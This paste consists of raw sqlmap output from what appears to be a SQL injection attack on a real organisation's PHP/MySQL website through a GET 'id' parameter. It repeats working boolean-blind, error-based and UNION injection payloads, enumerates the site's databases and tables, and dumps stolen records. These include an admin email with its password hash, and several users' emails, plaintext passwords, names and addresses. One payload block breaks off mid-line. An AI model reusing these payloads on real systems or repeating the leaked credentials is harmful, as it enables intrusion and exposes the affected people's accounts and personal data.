Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- sqlmap identified the following injection points with a total of 74 HTTP(s) requests:
- ---
- Place: GET
- Parameter: id
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: id=16' AND 2021=2021 AND 'RmLb'='RmLb
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: id=16' AND (SELECT 2160 FROM(SELECT COUNT(*),CONCAT(0x7165616e71,(SELECT (CASE WHEN (2160=2160) THEN 1 ELSE 0 END)),0x7169717271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'yfoq'='yfoq
- Type: UNION query
- Title: MySQL UNION query (NULL) - 16 columns
- Payload: id=-4545' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7165616e71,0x4c7a6a4f546549765745,0x7169717271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
- ---
- web application technology: PHP 5.3.29
- back-end DBMS: MySQL 5.0
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: GET
- Parameter: id
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: id=16' AND 2021=2021 AND 'RmLb'='RmLb
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: id=16' AND (SELECT 2160 FROM(SELECT COUNT(*),CONCAT(0x7165616e71,(SELECT (CASE WHEN (2160=2160) THEN 1 ELSE 0 END)),0x7169717271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'yfoq'='yfoq
- Type: UNION query
- Title: MySQL UNION query (NULL) - 16 columns
- Payload: id=-4545' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7165616e71,0x4c7a6a4f546549765745,0x7169717271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
- ---
- web application technology: PHP 5.3.29
- back-end DBMS: MySQL 5.0
- available databases [2]:
- [*] efnypvon_icd_db
- [*] information_schema
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: GET
- Parameter: id
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: id=16' AND 2021=2021 AND 'RmLb'='RmLb
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: id=16' AND (SELECT 2160 FROM(SELECT COUNT(*),CONCAT(0x7165616e71,(SELECT (CASE WHEN (2160=2160) THEN 1 ELSE 0 END)),0x7169717271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'yfoq'='yfoq
- Type: UNION query
- Title: MySQL UNION query (NULL) - 16 columns
- Payload: id=-4545' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7165616e71,0x4c7a6a4f546549765745,0x7169717271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
- ---
- web application technology: PHP 5.3.29
- back-end DBMS: MySQL 5.0
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: GET
- Parameter: id
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: id=16' AND 2021=2021 AND 'RmLb'='RmLb
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: id=16' AND (SELECT 2160 FROM(SELECT COUNT(*),CONCAT(0x7165616e71,(SELECT (CASE WHEN (2160=2160) THEN 1 ELSE 0 END)),0x7169717271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'yfoq'='yfoq
- Type: UNION query
- Title: MySQL UNION query (NULL) - 16 columns
- Payload: id=-4545' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7165616e71,0x4c7a6a4f546549765745,0x7169717271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
- ---
- web application technology: PHP 5.3.29
- back-end DBMS: MySQL 5.0
- Database: information_schema
- [61 tables]
- +---------------------------------------+
- | CHARACTER_SETS |
- | COLLATIONS |
- | COLLATION_CHARACTER_SET_APPLICABILITY |
- | COLUMNS |
- | COLUMN_PRIVILEGES |
- | ENGINES |
- | EVENTS |
- | FILES |
- | GLOBAL_STATUS |
- | GLOBAL_VARIABLES |
- | INNODB_BUFFER_PAGE |
- | INNODB_BUFFER_PAGE_LRU |
- | INNODB_BUFFER_POOL_STATS |
- | INNODB_CMP |
- | INNODB_CMPMEM |
- | INNODB_CMPMEM_RESET |
- | INNODB_CMP_PER_INDEX |
- | INNODB_CMP_PER_INDEX_RESET |
- | INNODB_CMP_RESET |
- | INNODB_FT_BEING_DELETED |
- | INNODB_FT_CONFIG |
- | INNODB_FT_DEFAULT_STOPWORD |
- | INNODB_FT_DELETED |
- | INNODB_FT_INDEX_CACHE |
- | INNODB_FT_INDEX_TABLE |
- | INNODB_LOCKS |
- | INNODB_LOCK_WAITS |
- | INNODB_METRICS |
- | INNODB_SYS_COLUMNS |
- | INNODB_SYS_DATAFILES |
- | INNODB_SYS_FIELDS |
- | INNODB_SYS_FOREIGN |
- | INNODB_SYS_FOREIGN_COLS |
- | INNODB_SYS_INDEXES |
- | INNODB_SYS_TABLES |
- | INNODB_SYS_TABLESPACES |
- | INNODB_SYS_TABLESTATS |
- | INNODB_SYS_VIRTUAL |
- | INNODB_TEMP_TABLE_INFO |
- | INNODB_TRX |
- | KEY_COLUMN_USAGE |
- | OPTIMIZER_TRACE |
- | PARAMETERS |
- | PARTITIONS |
- | PLUGINS |
- | PROCESSLIST |
- | PROFILING |
- | REFERENTIAL_CONSTRAINTS |
- | ROUTINES |
- | SCHEMATA |
- | SCHEMA_PRIVILEGES |
- | SESSION_STATUS |
- | SESSION_VARIABLES |
- | STATISTICS |
- | TABLES |
- | TABLESPACES |
- | TABLE_CONSTRAINTS |
- | TABLE_PRIVILEGES |
- | TRIGGERS |
- | USER_PRIVILEGES |
- | VIEWS |
- +---------------------------------------+
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: GET
- Parameter: id
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: id=16' AND 2021=2021 AND 'RmLb'='RmLb
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: id=16' AND (SELECT 2160 FROM(SELECT COUNT(*),CONCAT(0x7165616e71,(SELECT (CASE WHEN (2160=2160) THEN 1 ELSE 0 END)),0x7169717271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'yfoq'='yfoq
- Type: UNION query
- Title: MySQL UNION query (NULL) - 16 columns
- Payload: id=-4545' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7165616e71,0x4c7a6a4f546549765745,0x7169717271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
- ---
- web application technology: PHP 5.3.29
- back-end DBMS: MySQL 5.0
- Database: efnypvon_icd_db
- [30 tables]
- +----------------------------+
- | icd_addresses |
- | icd_basic_pages |
- | icd_category |
- | icd_contactus_entries |
- | icd_courses |
- | icd_download_category |
- | icd_events |
- | icd_faqs |
- | icd_featured_ads |
- | icd_footer_info |
- | icd_gallery_images |
- | icd_header_info |
- | icd_home_welcome |
- | icd_homepage_banner |
- | icd_media_coverage_videos |
- | icd_members |
- | icd_membership |
- | icd_online_enquiries |
- | icd_practitioner_directory |
- | icd_quick_links |
- | icd_social_media |
- | icd_tbl_admin |
- | icd_tbl_country |
- | icd_tbl_mysql_code |
- | icd_tbl_subscribers |
- | icd_tbl_templates |
- | icd_testimonials |
- | icd_upload_files |
- | icd_users |
- | icd_videos |
- +----------------------------+
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: GET
- Parameter: id
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: id=16' AND 2021=2021 AND 'RmLb'='RmLb
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: id=16' AND (SELECT 2160 FROM(SELECT COUNT(*),CONCAT(0x7165616e71,(SELECT (CASE WHEN (2160=2160) THEN 1 ELSE 0 END)),0x7169717271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'yfoq'='yfoq
- Type: UNION query
- Title: MySQL UNION query (NULL) - 16 columns
- Payload: id=-4545' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7165616e71,0x4c7a6a4f546549765745,0x7169717271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
- ---
- web application technology: PHP 5.3.29
- back-end DBMS: MySQL 5.0
- Database: efnypvon_icd_db
- Table: icd_tbl_admin
- [8 columns]
- +---------------------------+---------------+
- | Column | Type |
- +---------------------------+---------------+
- | fEmail | varchar(255) |
- | fPassword | varchar(255) |
- | fStatus | tinyint(2) |
- | fUserID | int(11) |
- | fUserName | varchar(20) |
- | last_login | datetime |
- | super_admin | enum('0','1') |
- | user_reply_email_contents | text |
- +---------------------------+---------------+
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: GET
- Parameter: id
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: id=16' AND 2021=2021 AND 'RmLb'='RmLb
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: id=16' AND (SELECT 2160 FROM(SELECT COUNT(*),CONCAT(0x7165616e71,(SELECT (CASE WHEN (2160=2160) THEN 1 ELSE 0 END)),0x7169717271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'yfoq'='yfoq
- Type: UNION query
- Title: MySQL UNION query (NULL) - 16 columns
- Payload: id=-4545' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7165616e71,0x4c7a6a4f546549765745,0x7169717271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
- ---
- web application technology: PHP 5.3.29
- back-end DBMS: MySQL 5.0
- Database: efnypvon_icd_db
- Table: icd_tbl_admin
- [1 entry]
- +-----------------+----------------------------------+
- | fEmail | fPassword |
- +-----------------+----------------------------------+
- | info@icd.org.pk | b61372eb4289a91ef1e8c851a2818093 |
- +-----------------+----------------------------------+
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: GET
- Parameter: id
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: id=16' AND 2021=2021 AND 'RmLb'='RmLb
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: id=16' AND (SELECT 2160 FROM(SELECT COUNT(*),CONCAT(0x7165616e71,(SELECT (CASE WHEN (2160=2160) THEN 1 ELSE 0 END)),0x7169717271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'yfoq'='yfoq
- Type: UNION query
- Title: MySQL UNION query (NULL) - 16 columns
- Payload: id=-4545' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7165616e71,0x4c7a6a4f546549765745,0x7169717271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
- ---
- web application technology: PHP 5.3.29
- back-end DBMS: MySQL 5.0
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: GET
- Parameter: id
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: id=16' AND 2021=2021 AND 'RmLb'='RmLb
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: id=16' AND (SELECT 2160 FROM(SELECT COUNT(*),CONCAT(0x7165616e71,(SELECT (CASE WHEN (2160=2160) THEN 1sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: GET
- Parameter: id
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: id=16' AND 2021=2021 AND 'RmLb'='RmLb
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: id=16' AND (SELECT 2160 FROM(SELECT COUNT(*),CONCAT(0x7165616e71,(SELECT (CASE WHEN (2160=2160) THEN 1 ELSE 0 END)),0x7169717271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'yfoq'='yfoq
- Type: UNION query
- Title: MySQL UNION query (NULL) - 16 columns
- Payload: id=-4545' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7165616e71,0x4c7a6a4f546549765745,0x7169717271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
- ---
- web application technology: PHP 5.3.29
- back-end DBMS: MySQL 5.0
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: GET
- Parameter: id
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: id=16' AND 2021=2021 AND 'RmLb'='RmLb
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: id=16' AND (SELECT 2160 FROM(SELECT COUNT(*),CONCAT(0x7165616e71,(SELECT (CASE WHEN (2160=2160) THEN 1 ELSE 0 END)),0x7169717271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'yfoq'='yfoq
- Type: UNION query
- Title: MySQL UNION query (NULL) - 16 columns
- Payload: id=-4545' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7165616e71,0x4c7a6a4f546549765745,0x7169717271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
- ---
- web application technology: PHP 5.3.29
- back-end DBMS: MySQL 5.0
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: GET
- Parameter: id
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: id=16' AND 2021=2021 AND 'RmLb'='RmLb
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: id=16' AND (SELECT 2160 FROM(SELECT COUNT(*),CONCAT(0x7165616e71,(SELECT (CASE WHEN (2160=2160) THEN 1 ELSE 0 END)),0x7169717271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'yfoq'='yfoq
- Type: UNION query
- Title: MySQL UNION query (NULL) - 16 columns
- Payload: id=-4545' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7165616e71,0x4c7a6a4f546549765745,0x7169717271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
- ---
- web application technology: PHP 5.3.29
- back-end DBMS: MySQL 5.0
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: GET
- Parameter: id
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: id=16' AND 2021=2021 AND 'RmLb'='RmLb
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: id=16' AND (SELECT 2160 FROM(SELECT COUNT(*),CONCAT(0x7165616e71,(SELECT (CASE WHEN (2160=2160) THEN 1 ELSE 0 END)),0x7169717271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'yfoq'='yfoq
- Type: UNION query
- Title: MySQL UNION query (NULL) - 16 columns
- Payload: id=-4545' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7165616e71,0x4c7a6a4f546549765745,0x7169717271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
- ---
- web application technology: PHP 5.3.29
- back-end DBMS: MySQL 5.0
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: GET
- Parameter: id
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: id=16' AND 2021=2021 AND 'RmLb'='RmLb
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: id=16' AND (SELECT 2160 FROM(SELECT COUNT(*),CONCAT(0x7165616e71,(SELECT (CASE WHEN (2160=2160) THEN 1 ELSE 0 END)),0x7169717271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'yfoq'='yfoq
- Type: UNION query
- Title: MySQL UNION query (NULL) - 16 columns
- Payload: id=-4545' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7165616e71,0x4c7a6a4f546549765745,0x7169717271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
- ---
- web application technology: PHP 5.3.29
- back-end DBMS: MySQL 5.0
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: GET
- Parameter: id
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: id=16' AND 2021=2021 AND 'RmLb'='RmLb
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: id=16' AND (SELECT 2160 FROM(SELECT COUNT(*),CONCAT(0x7165616e71,(SELECT (CASE WHEN (2160=2160) THEN 1 ELSE 0 END)),0x7169717271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'yfoq'='yfoq
- Type: UNION query
- Title: MySQL UNION query (NULL) - 16 columns
- Payload: id=-4545' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7165616e71,0x4c7a6a4f546549765745,0x7169717271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
- ---
- web application technology: PHP 5.3.29
- back-end DBMS: MySQL 5.0
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: GET
- Parameter: id
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: id=16' AND 2021=2021 AND 'RmLb'='RmLb
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: id=16' AND (SELECT 2160 FROM(SELECT COUNT(*),CONCAT(0x7165616e71,(SELECT (CASE WHEN (2160=2160) THEN 1 ELSE 0 END)),0x7169717271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'yfoq'='yfoq
- Type: UNION query
- Title: MySQL UNION query (NULL) - 16 columns
- Payload: id=-4545' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7165616e71,0x4c7a6a4f546549765745,0x7169717271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
- ---
- web application technology: PHP 5.3.29
- back-end DBMS: MySQL 5.0
- Database: efnypvon_icd_db
- [30 tables]
- +----------------------------+
- | icd_addresses |
- | icd_basic_pages |
- | icd_category |
- | icd_contactus_entries |
- | icd_courses |
- | icd_download_category |
- | icd_events |
- | icd_faqs |
- | icd_featured_ads |
- | icd_footer_info |
- | icd_gallery_images |
- | icd_header_info |
- | icd_home_welcome |
- | icd_homepage_banner |
- | icd_media_coverage_videos |
- | icd_members |
- | icd_membership |
- | icd_online_enquiries |
- | icd_practitioner_directory |
- | icd_quick_links |
- | icd_social_media |
- | icd_tbl_admin |
- | icd_tbl_country |
- | icd_tbl_mysql_code |
- | icd_tbl_subscribers |
- | icd_tbl_templates |
- | icd_testimonials |
- | icd_upload_files |
- | icd_users |
- | icd_videos |
- +----------------------------+
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: GET
- Parameter: id
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: id=16' AND 2021=2021 AND 'RmLb'='RmLb
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: id=16' AND (SELECT 2160 FROM(SELECT COUNT(*),CONCAT(0x7165616e71,(SELECT (CASE WHEN (2160=2160) THEN 1 ELSE 0 END)),0x7169717271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'yfoq'='yfoq
- Type: UNION query
- Title: MySQL UNION query (NULL) - 16 columns
- Payload: id=-4545' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7165616e71,0x4c7a6a4f546549765745,0x7169717271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
- ---
- web application technology: PHP 5.3.29
- back-end DBMS: MySQL 5.0
- Database: efnypvon_icd_db
- Table: icd_users
- [18 columns]
- +----------------------+---------------+
- | Column | Type |
- +----------------------+---------------+
- | address | text |
- | city | varchar(255) |
- | company_name | varchar(255) |
- | country | varchar(255) |
- | credit_for_net | varchar(255) |
- | display_order | int(11) |
- | first_name | varchar(255) |
- | is_credit_customer | enum('0','1') |
- | join_date | date |
- | last_name | varchar(255) |
- | newsletter_subscribe | enum('0','1') |
- | post_code | varchar(255) |
- | province_state | varchar(255) |
- | telephone | varchar(255) |
- | user_email | varchar(255) |
- | user_id | int(11) |
- | user_password | varchar(255) |
- | user_status | tinyint(4) |
- +----------------------+---------------+
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: GET
- Parameter: id
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: id=16' AND 2021=2021 AND 'RmLb'='RmLb
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: id=16' AND (SELECT 2160 FROM(SELECT COUNT(*),CONCAT(0x7165616e71,(SELECT (CASE WHEN (2160=2160) THEN 1 ELSE 0 END)),0x7169717271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'yfoq'='yfoq
- Type: UNION query
- Title: MySQL UNION query (NULL) - 16 columns
- Payload: id=-4545' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7165616e71,0x4c7a6a4f546549765745,0x7169717271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
- ---
- web application technology: PHP 5.3.29
- back-end DBMS: MySQL 5.0
- Database: efnypvon_icd_db
- Table: icd_users
- [3 entries]
- +---------+-------------------------+---------------+
- | user_id | user_email | user_password |
- +---------+-------------------------+---------------+
- | 3 | hussaincochin@gmail.com | 773828 |
- | 6 | ship@yahoo.com | ship |
- | 9 | tester@mail.com | tester |
- +---------+-------------------------+---------------+
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: GET
- Parameter: id
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: id=16' AND 2021=2021 AND 'RmLb'='RmLb
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: id=16' AND (SELECT 2160 FROM(SELECT COUNT(*),CONCAT(0x7165616e71,(SELECT (CASE WHEN (2160=2160) THEN 1 ELSE 0 END)),0x7169717271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'yfoq'='yfoq
- Type: UNION query
- Title: MySQL UNION query (NULL) - 16 columns
- Payload: id=-4545' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7165616e71,0x4c7a6a4f546549765745,0x7169717271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
- ---
- web application technology: PHP 5.3.29
- back-end DBMS: MySQL 5.0
- Database: efnypvon_icd_db
- Table: icd_users
- [18 columns]
- +----------------------+---------------+
- | Column | Type |
- +----------------------+---------------+
- | address | text |
- | city | varchar(255) |
- | company_name | varchar(255) |
- | country | varchar(255) |
- | credit_for_net | varchar(255) |
- | display_order | int(11) |
- | first_name | varchar(255) |
- | is_credit_customer | enum('0','1') |
- | join_date | date |
- | last_name | varchar(255) |
- | newsletter_subscribe | enum('0','1') |
- | post_code | varchar(255) |
- | province_state | varchar(255) |
- | telephone | varchar(255) |
- | user_email | varchar(255) |
- | user_id | int(11) |
- | user_password | varchar(255) |
- | user_status | tinyint(4) |
- +----------------------+---------------+
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: GET
- Parameter: id
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: id=16' AND 2021=2021 AND 'RmLb'='RmLb
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: id=16' AND (SELECT 2160 FROM(SELECT COUNT(*),CONCAT(0x7165616e71,(SELECT (CASE WHEN (2160=2160) THEN 1 ELSE 0 END)),0x7169717271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'yfoq'='yfoq
- Type: UNION query
- Title: MySQL UNION query (NULL) - 16 columns
- Payload: id=-4545' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7165616e71,0x4c7a6a4f546549765745,0x7169717271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
- ---
- web application technology: PHP 5.3.29
- back-end DBMS: MySQL 5.0
- Database: efnypvon_icd_db
- Table: icd_users
- [3 entries]
- +------------------+------------+--------------------+
- | address | first_name | is_credit_customer |
- +------------------+------------+--------------------+
- | 209 Pasture Lane | Hussain | 0 |
- | 2783 Canada | ship | 0 |
- | Address | fname | 1 |
- +------------------+------------+--------------------+
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: GET
- Parameter: id
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: id=16' AND 2021=2021 AND 'RmLb'='RmLb
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: id=16' AND (SELECT 2160 FROM(SELECT COUNT(*),CONCAT(0x7165616e71,(SELECT (CASE WHEN (2160=2160) THEN 1 ELSE 0 END)),0x7169717271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'yfoq'='yfoq
- Type: UNION query
- Title: MySQL UNION query (NULL) - 16 columns
- Payload: id=-4545' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7165616e71,0x4c7a6a4f546549765745,0x7169717271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
- ---
- web application technology: PHP 5.3.29
- back-end DBMS: MySQL 5.0
- Database: efnypvon_icd_db
- Table: icd_users
- [18 columns]
- +----------------------+---------------+
- | Column | Type |
- +----------------------+---------------+
- | address | text |
- | city | varchar(255) |
- | company_name | varchar(255) |
- | country | varchar(255) |
- | credit_for_net | varchar(255) |
- | display_order | int(11) |
- | first_name | varchar(255) |
- | is_credit_customer | enum('0','1') |
- | join_date | date |
- | last_name | varchar(255) |
- | newsletter_subscribe | enum('0','1') |
- | post_code | varchar(255) |
- | province_state | varchar(255) |
- | telephone | varchar(255) |
- | user_email | varchar(255) |
- | user_id | int(11) |
- | user_password | varchar(255) |
- | user_status | tinyint(4) |
- +----------------------+---------------+
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: GET
- Parameter: id
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: id=16' AND 2021=2021 AND 'RmLb'='RmLb
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: id=16' AND (SELECT 2160 FROM(SELECT COUNT(*),CONCAT(0x7165616e71,(SELECT (CASE WHEN (2160=2160) THEN 1 ELSE 0 END)),0x7169717271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'yfoq'='yfoq
- Type: UNION query
- Title: MySQL UNION query (NULL) - 16 columns
- Payload: id=-4545' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7165616e71,0x4c7a6a4f546549765745,0x7169717271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
- ---
- web application technology: PHP 5.3.29
- back-end DBMS: MySQL 5.0
- Database: efnypvon_icd_db
- Table: icd_users
- [3 entries]
- +----------------+-----------+----------------+
- | country | last_name | credit_for_net |
- +----------------+-----------+----------------+
- | United Kingdom | Cochin | <blank> |
- | US | save | <blank> |
- | 4 | lname | 8 |
- +----------------+-----------+----------------+
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: GET
- Parameter: id
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: id=16' AND 2021=2021 AND 'RmLb'='RmLb
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: id=16' AND (SELECT 2160 FROM(SELECT COUNT(*),CONCAT(0x7165616e71,(SELECT (CASE WHEN (2160=2160) THEN 1 ELSE 0 END)),0x7169717271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'yfoq'='yfoq
- Type: UNION query
- Title: MySQL UNION query (NULL) - 16 columns
